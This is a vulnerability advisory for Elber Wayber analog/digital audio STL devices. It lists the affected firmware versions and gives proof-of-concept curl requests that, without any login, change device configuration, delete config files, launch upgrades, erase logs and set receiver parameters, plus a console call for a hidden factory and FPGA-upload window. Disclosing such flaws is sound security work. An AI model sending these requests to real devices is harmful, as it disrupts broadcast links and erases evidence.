Elber Wayber Analog/Digital Audio STL 4.00 Insecure Direct Object Reference

2024.04.21
Credit: LiquidWorm
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Elber Wayber Analog/Digital Audio STL 4.00 Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342) Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131) Summary: Wayber II is the name of an analogue/digital microwave link able to transport a Mono or a MPX stereo signal from studio to audio transmitter. Compact and reliable, it features very high quality and modern technology both in signal processing and microwave section leading to outstanding performances. Desc: The device suffers from an unauthenticated device configuration and client-side hidden functionality disclosure. Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5823 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5823.php 18.08.2023 -- # Config fan $ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=' Configuration applied # Delete config $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2' File delete successfully # Launch upgrade $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1' Upgrade launched Successfully # Log erase $ curl 'http://TARGET/json_data/erase_log.js?until=-2' Logs erased # Until: # =0 ALL # =-2 Yesterday # =-8 Last week # =-15 Last two weeks # =-22 Last three weeks # =-31 Last month # Set RX config $ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0' RX Config Applied Successfully # Show factory window and FPGA upload (Console) > cleber_show_factory_wnd() # Etc.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top